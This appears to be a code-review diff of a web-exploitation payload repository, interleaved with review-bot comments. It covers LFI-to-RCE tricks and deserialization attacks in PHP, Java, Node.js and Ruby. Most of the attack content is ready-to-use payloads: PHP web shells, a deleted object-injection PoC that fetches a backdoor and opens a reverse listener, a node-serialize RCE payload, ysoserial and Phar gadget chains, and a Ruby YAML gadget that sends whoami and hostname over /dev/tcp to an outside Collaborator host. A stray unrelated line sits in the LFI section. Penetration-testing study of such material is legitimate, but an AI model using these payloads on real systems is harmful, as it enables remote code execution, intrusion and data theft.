Specify your payload in the POST parameters, this can be done with a simple `curl` command.
@ -196,6 +210,7 @@ Alternatively, Kadimus has a module to automate this attack.
./kadimus -u "https://example.com/index.php?page=php://input%00" -C '<?php echo shell_exec("id"); ?>' -T input
```


### Wrapper phar://

Create a phar file with a serialized object in its meta-data.
@ -229,6 +244,7 @@ include('phar://test.phar');

NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more.


## LFI to RCE via /proc/*/fd

1. Upload a lot of shells (for example : 100)
@ -243,6 +259,7 @@ GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
```


## LFI to RCE via upload

If you can upload a file, just inject the shell payload in it (e.g : `<?php system($_GET['c']); ?>` ).
@ -253,6 +270,7 @@ http://example.com/index.php?page=path/to/uploaded/file.png

In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf


## LFI to RCE via upload (race)
Worlds Quitest Let's Play"
* Upload a file and trigger a self-inclusion.
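Review bot: the context line `Worlds Quitest Let's Play"` directly under `## LFI to RCE via upload (race)` is unrelated text with a stray closing quote (it looks like an accidental paste); since this hunk already touches the section, it should be removed in the same change.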
@ -447,12 +465,14 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
|
||||
* [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/)
|
||||
* [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html)
|
||||
* [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
|
||||
* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
|
||||
* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
|
||||
* [Baby^H Master PHP 2017 by @orangetw](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017)
|
||||
* [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379)
|
||||
* [Чтение файлов => unserialize !](https://web.archive.org/web/20200809082021/https://rdot.org/forum/showthread.php?t=4379)
|
||||
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
|
||||
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
|
||||
* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
|
||||
* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
|
||||
* [PHP LFI with Nginx Assistance](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
||||
* [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - gynvael.coldwind - 2011-03-18](https://gynvael.coldwind.pl/?id=376)
|
||||
* [LFI2RCE via PHP Filters - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters)
|
||||
* [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
|
||||
|
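Review bot: the CVV #1 reference is listed twice with the same URL (`CVV #1: Local File Inclusion - SI9INT` and `CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018`); keep only the dated entry. Swapping the dead soffensive.com and rdot.org links for web.archive.org copies is the right move, since the archived URL still embeds the original path and date.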
@ -33,6 +33,7 @@
|
||||
* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
|
||||
* [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
|
||||
* [AutoGraphql + introspection](https://graphql-dashboard.herokuapp.com/)
|
||||
* [CrackQL - A GraphQL password brute-force and fuzzing utility.](https://github.com/nicholasaleks/CrackQL)
|
||||
|
||||
## Exploit
|
||||
|
||||
|
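Review bot: the new CrackQL entry ends its description with a period while the sibling InQL, Insomnia and AutoGraphql entries do not; drop the trailing period so the list reads uniformly.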
@ -1,32 +0,0 @@
|
||||
<?php
|
||||
/*
|
||||
PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com
|
||||
|
||||
A simple PoC to exploit PHP Object Injections flaws and gain remote shell access.
|
||||
|
||||
Shouts to @jstnkndy @yappare for the assist!
|
||||
|
||||
NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
|
||||
*/
|
||||
|
||||
print "==============================================================================\r\n";
|
||||
print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
|
||||
print "==============================================================================\r\n";
|
||||
print "[+] Generating serialized payload...[OK]\r\n";
|
||||
print "[+] Launching reverse listener...[OK]\r\n";
|
||||
system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');
|
||||
|
||||
class PHPObjectInjection
|
||||
{
|
||||
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
|
||||
public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
|
||||
}
|
||||
|
||||
$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
|
||||
$url = $url . urlencode(serialize(new PHPObjectInjection));
|
||||
print "[+] Sending exploit...[OK]\r\n";
|
||||
print "[+] Dropping down to interactive shell...[OK]\r\n";
|
||||
print "==============================================================================\r\n";
|
||||
$response = file_get_contents("$url");
|
||||
|
||||
?>
|
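Review bot: removing this PoC is reasonable, but the hunk shows only the deletion; check that no other file in the tree still links to it, or the link goes dead. The script was also tied to one lab (a hard-coded `gnome-terminal` listener and a `localhost/xvwa` target URL) and phpggc, already documented in PHP.md, covers the same ground in a reusable way, which is worth stating in the commit message.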
5
Insecure Deserialization/Files/node-serialize.js
Normal file
@ -0,0 +1,5 @@
|
||||
var y = {
|
||||
rce : function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });},
|
||||
}
|
||||
var serialize = require('node-serialize');
|
||||
console.log("Serialized: \n" + serialize.serialize(y));
|
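Review bot: this new file duplicates the snippet that Node.md (added in the same merge) carries inline under step 1, so the two copies will drift; keep one and link to it from the other. The `exec` callback also ignores `error`, so a command that fails prints nothing; logging `error` next to `stdout` makes the PoC easier to debug.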
19
Insecure Deserialization/Files/ruby-serialize.yaml
Normal file
@ -0,0 +1,19 @@
|
||||
---
|
||||
- !ruby/object:Gem::Installer
|
||||
i: x
|
||||
- !ruby/object:Gem::SpecFetcher
|
||||
i: y
|
||||
- !ruby/object:Gem::Requirement
|
||||
requirements:
|
||||
!ruby/object:Gem::Package::TarReader
|
||||
io: &1 !ruby/object:Net::BufferedIO
|
||||
io: &1 !ruby/object:Gem::Package::TarReader::Entry
|
||||
read: 0
|
||||
header: "abc"
|
||||
debug_output: &1 !ruby/object:Net::WriteAdapter
|
||||
socket: &1 !ruby/object:Gem::RequestSet
|
||||
sets: !ruby/object:Net::WriteAdapter
|
||||
socket: !ruby/module 'Kernel'
|
||||
method_id: :system
|
||||
git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'"
|
||||
method_id: :resolve
|
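Review bot: `git_set` embeds a concrete Burp Collaborator hostname (`wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net`) that belongs to whoever built the payload and is useless to everyone else; replace it with a placeholder such as `ATTACKER_DOMAIN`, as Ruby.md's copy of the same gadget does with `git_set: id`. A one-line header comment naming the origin of the chain (the elttam / staaldraad work cited in Ruby.md) and the Ruby versions it targets would also help readers pick the right file.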
@ -2,14 +2,16 @@
|
||||
|
||||
## Detection
|
||||
|
||||
- "AC ED 00 05" in Hex
|
||||
- "rO0" in Base64
|
||||
- `"AC ED 00 05"` in Hex
|
||||
* `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol.
|
||||
* `00 05`: STREAM_VERSION. The serialization version.
|
||||
- `"rO0"` in Base64
|
||||
- Content-type = "application/x-java-serialized-object"
|
||||
- "H4sIAAAAAAAAAJ" in gzip(base64)
|
||||
- `"H4sIAAAAAAAAAJ"` in gzip(base64)
|
||||
|
||||
## Exploit
|
||||
|
||||
[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
|
||||
[frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
|
||||
|
||||
```java
|
||||
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
|
||||
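Review bot: the command block following `[frohoff/ysoserial]` is fenced as ```java but contains shell invocations of `java -jar`; tag it `ps1` or `bash` like the rest of the repository so highlighting and copy-paste behave. In the Detection list, `Content-type = "application/x-java-serialized-object"` should be backticked now that the other indicators are; the `STREAM_MAGIC` / `STREAM_VERSION` sub-bullets are a good addition.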
@ -18,37 +20,44 @@ java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > pay
|
||||
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
|
||||
```
|
||||
|
||||
payload | author | dependencies | impact (if not RCE)
|
||||
------|--------|------ |------
|
||||
BeanShell1 |@pwntester, @cschneider4711 |bsh:2.0b5
|
||||
C3P0 |@mbechler |c3p0:0.9.5.2, mchange-commons-java:0.2.11
|
||||
Clojure |@JackOfMostTrades |clojure:1.8.0
|
||||
CommonsBeanutils1 |@frohoff |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
|
||||
CommonsCollections1 |@frohoff |commons-collections:3.1
|
||||
CommonsCollections2 |@frohoff |commons-collections4:4.0
|
||||
CommonsCollections3 |@frohoff |commons-collections:3.1
|
||||
CommonsCollections4 |@frohoff |commons-collections4:4.0
|
||||
CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1
|
||||
CommonsCollections6 |@matthias_kaiser |commons-collections:3.1
|
||||
FileUpload1 |@mbechler |commons-fileupload:1.3.1, commons-io:2.4 | file uploading
|
||||
Groovy1 |@frohoff |groovy:2.3.9
|
||||
Hibernate1 |@mbechler|
|
||||
Hibernate2 |@mbechler|
|
||||
JBossInterceptors1 |@matthias_kaiser |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
JRMPClient |@mbechler|
|
||||
JRMPListener |@mbechler|
|
||||
JSON1 |@mbechler |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
|
||||
JavassistWeld1 |@matthias_kaiser |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
Jdk7u21 |@frohoff|
|
||||
Jython1 |@pwntester, @cschneider4711 |jython-standalone:2.5.2
|
||||
MozillaRhino1 |@matthias_kaiser |js:1.7R2
|
||||
Myfaces1 |@mbechler|
|
||||
Myfaces2 |@mbechler|
|
||||
ROME |@mbechler |rome:1.0
|
||||
Spring1 |@frohoff |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
|
||||
Spring2 |@mbechler |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
|
||||
URLDNS |@gebl| | jre only vuln detect
|
||||
Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4
|
||||
```ps1
|
||||
Payload Authors Dependencies
|
||||
------- ------- ------------
|
||||
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
|
||||
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
|
||||
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
|
||||
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
|
||||
Clojure @JackOfMostTrades clojure:1.8.0
|
||||
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
|
||||
CommonsCollections1 @frohoff commons-collections:3.1
|
||||
CommonsCollections2 @frohoff commons-collections4:4.0
|
||||
CommonsCollections3 @frohoff commons-collections:3.1
|
||||
CommonsCollections4 @frohoff commons-collections4:4.0
|
||||
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
|
||||
CommonsCollections6 @matthias_kaiser commons-collections:3.1
|
||||
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
|
||||
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
|
||||
Groovy1 @frohoff groovy:2.3.9
|
||||
Hibernate1 @mbechler
|
||||
Hibernate2 @mbechler
|
||||
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
JRMPClient @mbechler
|
||||
JRMPListener @mbechler
|
||||
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
|
||||
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
Jdk7u21 @frohoff
|
||||
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
|
||||
MozillaRhino1 @matthias_kaiser js:1.7R2
|
||||
MozillaRhino2 @_tint0 js:1.7R2
|
||||
Myfaces1 @mbechler
|
||||
Myfaces2 @mbechler
|
||||
ROME @mbechler rome:1.0
|
||||
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
|
||||
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
|
||||
URLDNS @gebl
|
||||
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
|
||||
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
|
||||
```
|
||||
|
||||
## Burp extensions using ysoserial
|
||||
|
||||
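Review bot: replacing the markdown table with a preformatted ```ps1 block drops the `impact (if not RCE)` column, so the notes that FileUpload1 yields `file uploading` and URLDNS is a `jre only vuln detect` probe are lost even though both payloads are still listed; keep that column, or add the two remarks inline. The new list does add AspectJWeaver, Click1, CommonsCollections7, MozillaRhino2 and Vaadin1, which is the real gain, but `ps1` is the wrong fence tag for a plain-text listing; an untagged fence or `text` fits better.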
@ -67,7 +76,8 @@ Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:
|
||||
- [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution
|
||||
|
||||
```java
|
||||
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
|
||||
$ java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
|
||||
$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389
|
||||
|
||||
where
|
||||
-a - generates/tests all payloads for that marshaller
|
||||
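Review bot: the marshalsec block is fenced as ```java but holds shell commands, and the hunk now carries both the bare usage line and a `$`-prefixed copy of the same line; drop one. In the `LDAPRefServer` example the `\#` escape is unnecessary inside a code fence (the shell simply unescapes it), so `http://localhost:8000#exploit.JNDIExploit` is clearer; a trailing comment that `1389` is the port the reference server listens on would also help.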
@ -99,10 +109,12 @@ Payload generators for the following marshallers are included:<br />
|
||||
## References
|
||||
|
||||
- [Github - ysoserial](https://github.com/frohoff/ysoserial)
|
||||
- [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
|
||||
- [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau | Mar 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
|
||||
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
||||
- [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
|
||||
- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
|
||||
- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
|
||||
- [Jackson CVE-2019-12384: anatomy of a vulnerability class](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
|
||||
- [On Jackson CVEs: Don’t Panic — Here is what you need to know](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96)
|
||||
- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)
|
||||
- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)
|
||||
|
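Review bot: the ForgeRock OpenAM (CVE-2021-35464) reference appears twice with identical title and URL; only one copy should survive the merge.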
34
Insecure Deserialization/Node.md
Normal file
@ -0,0 +1,34 @@
|
||||
# Node
|
||||
|
||||
## Summary
|
||||
|
||||
* [Exploit](#exploit)
|
||||
* [References](#references)
|
||||
|
||||
## Exploit
|
||||
|
||||
> An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
|
||||
|
||||
1. Generate a serialized payload
|
||||
```js
|
||||
var y = {
|
||||
rce : function(){
|
||||
require('child_process').exec('ls /', function(error,
|
||||
stdout, stderr) { console.log(stdout) });
|
||||
},
|
||||
}
|
||||
var serialize = require('node-serialize');
|
||||
console.log("Serialized: \n" + serialize.serialize(y));
|
||||
```
|
||||
2. Add bracket `()` to force the execution
|
||||
```js
|
||||
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}
|
||||
```
|
||||
3. Send the payload
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
|
||||
* [NodeJS Deserialization - 8 January 2020- gonczor](https://blacksheephacks.pl/nodejs-deserialization/)
|
||||
* [CVE-2017-5941 - NATIONAL VULNERABILITY DATABASE - 02/09/2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
|
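Review bot: step 3 `Send the payload` does not say where the serialized object goes; name the request location (the cookie or parameter that reaches `unserialize()`) as the other language files do, otherwise the procedure stops short. The quoted description is unattributed; it reads like the NVD text for CVE-2017-5941, which is cited below, so credit it. Minor: `8 January 2020- gonczor` is missing a space before the hyphen.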
@ -119,7 +119,7 @@ a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
|
||||
|
||||
## Finding and using gadgets
|
||||
|
||||
Also called "PHP POP Chains", they can be used to gain RCE on the system.
|
||||
Also called `"PHP POP Chains"`, they can be used to gain RCE on the system.
|
||||
|
||||
[PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks:
|
||||
|
||||
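Review bot: wrapping `"PHP POP Chains"` in backticks marks a plain name as code; use either the quotes or the backticks, not both (plain `PHP POP chains` reads best).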
@ -133,6 +133,7 @@ Also called "PHP POP Chains", they can be used to gain RCE on the system.
|
||||
|
||||
```powershell
|
||||
phpggc monolog/rce1 'phpinfo();' -s
|
||||
phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini
|
||||
```
|
||||
|
||||
## PHP Phar Deserialization
|
||||
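Review bot: the added `phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini` line is the first place `-p phar` appears, but nothing says what it does; a short comment that it wraps the chain in a Phar archive written to the `-o` path, which the `phar://` section below then consumes, would tie the two sections together. The fence is also ```powershell for a Linux CLI; `bash` fits better.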
@ -141,42 +142,68 @@ Using `phar://` wrapper, one can trigger a deserialization on the specified file
|
||||
|
||||
A valid PHAR includes four elements:
|
||||
|
||||
1. Stub
|
||||
2. Manifest
|
||||
3. File Contents
|
||||
4. Signature
|
||||
1. **Stub**: The stub is a chunk of PHP code which is executed when the file is accessed in an executable context. At a minimum, the stub must contain `__HALT_COMPILER();` at its conclusion. Otherwise, there are no restrictions on the contents of a Phar stub.
|
||||
2. **Manifest**: Contains metadata about the archive and its contents.
|
||||
3. **File Contents**: Contains the actual files in the archive.
|
||||
4. **Signature**(optional): For verifying archive integrity.
|
||||
|
||||
Example of a Phar creation in order to exploit a custom `PDFGenerator`.
|
||||
|
||||
```php
|
||||
<?php
|
||||
class PDFGenerator { }
|
||||
* Example of a Phar creation in order to exploit a custom `PDFGenerator`.
|
||||
```php
|
||||
<?php
|
||||
class PDFGenerator { }
|
||||
|
||||
//Create a new instance of the Dummy class and modify its property
|
||||
$dummy = new PDFGenerator();
|
||||
$dummy->callback = "passthru";
|
||||
$dummy->fileName = "uname -a > pwned"; //our payload
|
||||
//Create a new instance of the Dummy class and modify its property
|
||||
$dummy = new PDFGenerator();
|
||||
$dummy->callback = "passthru";
|
||||
$dummy->fileName = "uname -a > pwned"; //our payload
|
||||
|
||||
// Delete any existing PHAR archive with that name
|
||||
@unlink("poc.phar");
|
||||
// Delete any existing PHAR archive with that name
|
||||
@unlink("poc.phar");
|
||||
|
||||
// Create a new archive
|
||||
$poc = new Phar("poc.phar");
|
||||
// Create a new archive
|
||||
$poc = new Phar("poc.phar");
|
||||
|
||||
// Add all write operations to a buffer, without modifying the archive on disk
|
||||
$poc->startBuffering();
|
||||
// Add all write operations to a buffer, without modifying the archive on disk
|
||||
$poc->startBuffering();
|
||||
|
||||
// Set the stub
|
||||
$poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();");
|
||||
// Set the stub
|
||||
$poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();");
|
||||
|
||||
/* Add a new file in the archive with "text" as its content*/
|
||||
$poc["file"] = "text";
|
||||
// Add the dummy object to the metadata. This will be serialized
|
||||
$poc->setMetadata($dummy);
|
||||
// Stop buffering and write changes to disk
|
||||
$poc->stopBuffering();
|
||||
?>
|
||||
```
|
||||
/* Add a new file in the archive with "text" as its content*/
|
||||
$poc["file"] = "text";
|
||||
// Add the dummy object to the metadata. This will be serialized
|
||||
$poc->setMetadata($dummy);
|
||||
// Stop buffering and write changes to disk
|
||||
$poc->stopBuffering();
|
||||
?>
|
||||
```
|
||||
|
||||
* Example of a Phar creation with a `JPEG` magic byte header since there is no restriction on the content of stub.
|
||||
```php
|
||||
<?php
|
||||
class AnyClass {
|
||||
public $data = null;
|
||||
public function __construct($data) {
|
||||
$this->data = $data;
|
||||
}
|
||||
|
||||
function __destruct() {
|
||||
system($this->data);
|
||||
}
|
||||
}
|
||||
|
||||
// create new Phar
|
||||
$phar = new Phar('test.phar');
|
||||
$phar->startBuffering();
|
||||
$phar->addFromString('test.txt', 'text');
|
||||
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
|
||||
|
||||
// add object of any class as meta data
|
||||
$object = new AnyClass('whoami');
|
||||
$phar->setMetadata($object);
|
||||
$phar->stopBuffering();
|
||||
```
|
||||
|
||||
|
||||
## Real world examples
|
||||
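Review bot: both Phar examples need `phar.readonly=0` (e.g. `php -d phar.readonly=0 poc.php`), otherwise `new Phar()` cannot write the archive; state that once above the examples. In the first example `callback` and `fileName` are dynamic properties on the empty `PDFGenerator` class, which PHP 8.2 deprecates; declare them as `public` properties. The expanded four-element list (stub, manifest, file contents, signature) is a clear improvement; in the second example say that `\xff\xd8\xff` is the JPEG SOI marker so readers see why the stub begins with it.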
@ -200,3 +227,4 @@ $poc->stopBuffering();
|
||||
* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41)
|
||||
* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
|
||||
* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
|
||||
* [phar:// deserialization - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization)
|
@ -8,6 +8,11 @@ Check the following sub-sections, located in other files :
|
||||
* [PHP (Object injection) : phpggc, ...](PHP.md)
|
||||
* [Ruby : universal rce gadget, ...](Ruby.md)
|
||||
* [Python : pickle, ...](Python.md)
|
||||
* [YAML : PyYAML, ...](YAML.md)
|
||||
|
||||
## LABS
|
||||
|
||||
* [Insecure Deserialization 10 labs](https://portswigger.net/web-security/all-labs#insecure-deserialization)
|
||||
|
||||
## References
|
||||
|
||||
|
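Review bot: `## LABS` is uppercase while the other files in this merge use `## Labs` (IDOR and JWT); keep the casing consistent.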
@ -16,7 +16,7 @@ require "yaml"
|
||||
YAML.load(File.read("p.yml"))
|
||||
```
|
||||
|
||||
Exploitation code
|
||||
Universal gadget for ruby <= 2.7.2:
|
||||
```ruby
|
||||
--- !ruby/object:Gem::Requirement
|
||||
requirements:
|
||||
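Review bot: the gadget that follows `Universal gadget for ruby <= 2.7.2:` is a YAML document but the fence is tagged ```ruby; tag it `yaml`. Since the `YAML.load(File.read("p.yml"))` sink shown above this hunk is the thing being exploited, a sentence that Psych 4 (Ruby 3.1) made `YAML.load` safe by default, so the unsafe path on current Rubies is `YAML.unsafe_load`, would save readers a failed reproduction.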
@ -29,9 +29,35 @@ requirements:
|
||||
spec:
|
||||
```
|
||||
|
||||
Universal gadget for ruby 2.x - 3.x.
|
||||
|
||||
```ruby
|
||||
---
|
||||
- !ruby/object:Gem::Installer
|
||||
i: x
|
||||
- !ruby/object:Gem::SpecFetcher
|
||||
i: y
|
||||
- !ruby/object:Gem::Requirement
|
||||
requirements:
|
||||
!ruby/object:Gem::Package::TarReader
|
||||
io: &1 !ruby/object:Net::BufferedIO
|
||||
io: &1 !ruby/object:Gem::Package::TarReader::Entry
|
||||
read: 0
|
||||
header: "abc"
|
||||
debug_output: &1 !ruby/object:Net::WriteAdapter
|
||||
socket: &1 !ruby/object:Gem::RequestSet
|
||||
sets: !ruby/object:Net::WriteAdapter
|
||||
socket: !ruby/module 'Kernel'
|
||||
method_id: :system
|
||||
git_set: id
|
||||
method_id: :resolve
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
|
||||
- [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
|
||||
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
|
||||
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
|
||||
- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
|
||||
* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
|
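Review bot: the PentesterLab reference (`Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain`) appears twice, and the last entry uses `*` where the rest use `-`; make sure one copy survives and unify the bullet marker. The `Universal gadget for ruby 2.x - 3.x.` block is again fenced ```ruby although it is YAML, and the same payload now lives in three places (here, YAML.md and Files/ruby-serialize.yaml) with different `git_set` values; one canonical copy with a placeholder command would avoid drift.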
99
Insecure Deserialization/YAML.md
Normal file
@ -0,0 +1,99 @@
|
||||
# YAML Deserialization
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
